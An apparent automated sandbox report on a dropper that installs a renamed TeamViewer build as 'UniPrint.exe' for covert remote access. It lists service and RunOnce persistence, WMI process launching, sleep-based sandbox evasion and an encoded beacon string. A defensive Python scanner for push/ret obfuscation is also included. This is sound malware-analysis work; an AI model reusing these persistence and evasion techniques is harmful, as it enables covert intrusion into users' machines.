Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: C:\Users\user\Desktop\wogZe27GBB.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C5F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 3_2_6E5C5F30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004C6E36 AdjustTokenPrivileges, 5_2_004C6E36
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C5F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 5_2_6E5C5F30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Local\Temp\nsrC1C9.tmp
Source: nsrC1CA.tmp.0.dr Binary string: Driver.GetDriverIPAddress.GetAdaptersInfo2.Error = Driver.GetDriverIPAddress.Memory allocation errorDriver.GetDriverIPAddress.GetAdaptersInfo.Error = Driver.NoSubkeys DriverConnector.GetGUIDfromRegistry: RegCloseKey(unit_key) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(component_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(net_cfg_instance_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegCloseKey(adapter_key) failed with error Driver.KeyError ComponentIdDriver.NoRegKey SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}DriverConnector.RemoveIPAddresses: DeleteIPAddress() failed with error DriverConnector.Close: CloseHandle failed\DEVICE\TCPIP_CDriverConnector::Init() GetIndex failed DriverConnector.Init: GetGUIDfromRegistry failedDriverConnector.Open: FlushIpNetTable failed with error DriverConnector.Open: IpRenewAddress failed with error Driver.Invalid.IPDriver.TAP_IOCTL_SET_MEDIA_STATUS.RejectedDriver.GetMAC.FailedDriver.DHCP.Failed1.0.0.7255.0.0.0DriverConnector.Open: DeviceIOControl(MTU) failedDriverConnector.Open: CreateFile failed with error \\.\Global\.dgt
Source: classification engine Classification label: mal72.evad.winEXE@13/7@4/5
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C2AC0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,StrChrW,StrChrW,SysAllocString,StrChrW,SysAllocString,SysFreeString,VariantInit,VariantInit,StrChrW,StrChrW,lstrlenW,SysAllocStringLen,PathQuoteSpacesW,VariantInit,StrChrW,SysAllocString,StrChrW,VariantInit,StrChrW,StrChrW,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 3_2_6E5C2AC0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle, 3_2_6E5C3DC0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle, 5_2_6E5C3DC0
Source: C:\Users\user\Desktop\wogZe27GBB.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,73D5A680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_00404356
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C9B10 SwitchDesktop,SetThreadDesktop,LoadLibraryW,GetProcessHeap,HeapAlloc,RtlZeroMemory,GetSystemDirectoryW,PathAddBackslashW,lstrcatW,LoadLibraryExW,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,StrChrW,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep, 3_2_6E5C9B10
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C3920 QueryServiceConfigW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,QueryServiceConfigW,ChangeServiceConfigW,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceW, 3_2_6E5C3920
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Mutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Mutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAMOEBAAAA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C5180 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource, 3_2_6E5C5180
Source: C:\Users\user\Desktop\wogZe27GBB.exe File written: C:\Users\user\AppData\Roaming\ViberPC\Icons\TeamViewer.ini
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: wogZe27GBB.exe Static file information: File size 1773472 > 1048576
Source: wogZe27GBB.exe Static PE information: certificate valid
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000002.707742521.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000002.1076091636.000000006E5CC000.00000002.00020000.sdmp, svchost.exe, 00000007.00000002.1072106592.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759626756.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.762333599.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000002.776275044.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.780622367.000000006E5CC000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, nsrC1CA.tmp.0.dr

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0053E60D push ecx; ret 5_2_0053E620
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0053BD8D push ecx; ret 5_2_0053BDA0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 11_3_029AFAC6 push eax; ret 11_3_029AFAC9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 11_3_029B24F9 pushfd ; ret 11_3_029B24FA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 12_2_027E6D2C push ds; ret 12_2_027E6D2F
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 12_2_027E6FCC push esi; ret 12_2_027E6FCF
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 14_3_0285EBC8 push eax; retf 14_3_0285EBC9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 14_3_0282E9D5 push ebp; ret 14_3_0282E9D7
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 14_3_0282E35C push ebp; iretd 14_3_0282E35F
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 14_3_0282E57C push ecx; retf 14_3_0282E57F
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00405E88
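The push/ret entries above come from a byte-pattern heuristic rather than a semantic analysis: a `push X` immediately followed by a return-family instruction transfers control to X without a visible jmp or call, which is why sandboxes flag it. The scanner below is an added example, not code from the sandbox or from the sample; it finds the same pairs in a raw code buffer, resolves the target when the pushed value is an immediate, and checks whether a hit lies inside a mapped image. SAMPLE_CODE is constructed, and the image extent in ASSUMED_IMAGE is an assumed figure, since the page does not give the module's SizeOfImage.

```python
"""Locate `push X; ret` sequences in raw x86 bytes.

Added example (not the sandbox's or the sample's code). It mirrors the
heuristic behind the "push ecx; ret" style entries in the report: a push
followed by a return is an indirect jump to whatever was pushed, which hides
the real control-flow edge from a linear disassembler. SAMPLE_CODE and the
image size in ASSUMED_IMAGE are constructed for illustration.
"""
from dataclasses import dataclass
from typing import List, Optional

# One-byte PUSH encodings seen in the report's entries (opcode -> mnemonic).
PUSH_ONE_BYTE = {
    0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds",
    0x50: "push eax", 0x51: "push ecx", 0x52: "push edx", 0x53: "push ebx",
    0x54: "push esp", 0x55: "push ebp", 0x56: "push esi", 0x57: "push edi",
    0x60: "pushad", 0x9C: "pushfd",
}
PUSH_IMM32 = 0x68  # push imm32: 68 xx xx xx xx
# Return-family opcodes that pop the pushed value into EIP.
RET_OPCODES = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}


@dataclass
class Hit:
    address: int           # virtual address of the push
    mnemonic: str          # e.g. "push ecx; ret"
    target: Optional[int]  # resolved only for push imm32; ret


def scan_push_ret(code: bytes, base: int = 0) -> List[Hit]:
    """Return every push/ret pair in `code`, addresses rebased to `base`."""
    hits: List[Hit] = []
    i, n = 0, len(code)
    while i < n:
        op = code[i]
        # push imm32; ret -> the jump target is the immediate itself.
        if op == PUSH_IMM32 and i + 5 < n and code[i + 5] in RET_OPCODES:
            target = int.from_bytes(code[i + 1:i + 5], "little")
            hits.append(Hit(base + i, f"push 0x{target:08x}; {RET_OPCODES[code[i + 5]]}", target))
            i += 6
            continue
        # push reg/seg/flags; ret -> target is whatever the register held.
        if op in PUSH_ONE_BYTE and i + 1 < n and code[i + 1] in RET_OPCODES:
            hits.append(Hit(base + i, f"{PUSH_ONE_BYTE[op]}; {RET_OPCODES[code[i + 1]]}", None))
            i += 2
            continue
        i += 1
    return hits


def in_image(address: int, image_base: int, image_size: int) -> bool:
    """True if the address lies inside a mapped PE image rather than heap/stack."""
    return image_base <= address < image_base + image_size


# Constructed bytes: nop; push ecx; ret; push 0x12345678; ret; pushfd; ret; int3
SAMPLE_CODE = b"\x90\x51\xc3\x68\x78\x56\x34\x12\xc3\x9c\xc3\xcc"
SAMPLE_BASE = 0x00401000
# Assumed extent of the 0x00400000 module; the page gives no SizeOfImage.
ASSUMED_IMAGE = (0x00400000, 0x00160000)

if __name__ == "__main__":
    for h in scan_push_ret(SAMPLE_CODE, SAMPLE_BASE):
        where = "image" if in_image(h.address, *ASSUMED_IMAGE) else "outside image"
        print(f"{h.address:08x}  {h.mnemonic:<28} [{where}]")
    # Two addresses from the report: a process 5 hit and a process 11 hit.
    print(in_image(0x0053E620, *ASSUMED_IMAGE), in_image(0x029AFAC6, *ASSUMED_IMAGE))
```

Which hits deserve attention follows from the address. 5_2_0053E620 and 5_2_0053BDA0 fall inside the UniPrint.exe image next to the MSVC runtime routines listed elsewhere on this page (the IsDebuggerPresent/SetUnhandledExceptionFilter sequence at 0x0053496B), so they can be opened in a disassembler and judged. The 0x027Exxxx to 0x029Bxxxx hits from processes 11, 12 and 14 lie outside both that executable and the TV.dll mapping at 0x6E5Cxxxx; in such regions two adjacent bytes that happen to decode as push/ret are usually data, not an obfuscated jump.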

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW, 5_2_004E177C

Boot Survival:

Creates or modifies windows services
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\Parameters
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C3920 QueryServiceConfigW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,QueryServiceConfigW,ChangeServiceConfigW,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceW, 3_2_6E5C3920
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\wogZe27GBB.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004FB7F9 5_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004DC9D6 5_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_00500C6A 5_2_00500C6A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004FFF68 5_2_004FFF68
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 3040 Thread sleep count: 301 > 30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 3040 Thread sleep time: -150500s >= -30000s
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 5512 Thread sleep count: 294 > 30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 5512 Thread sleep time: -147000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6328 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Last function: Thread delayed
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 3_2_6E5CB420
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004FFF68 5_2_004FFF68
Contains functionality to query network adapter information
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo, 5_2_004B9A29
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetAdaptersInfo, 5_2_6E5C88E0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E61 FindFirstFileA,FindClose, 0_2_00405E61
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040263E FindFirstFileA, 0_2_0040263E
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_0040548B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose, 3_2_6E5C2EF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose, 3_2_6E5C2960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose, 5_2_6E5C2EF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose, 5_2_6E5C2960
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp Binary or memory string: /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU
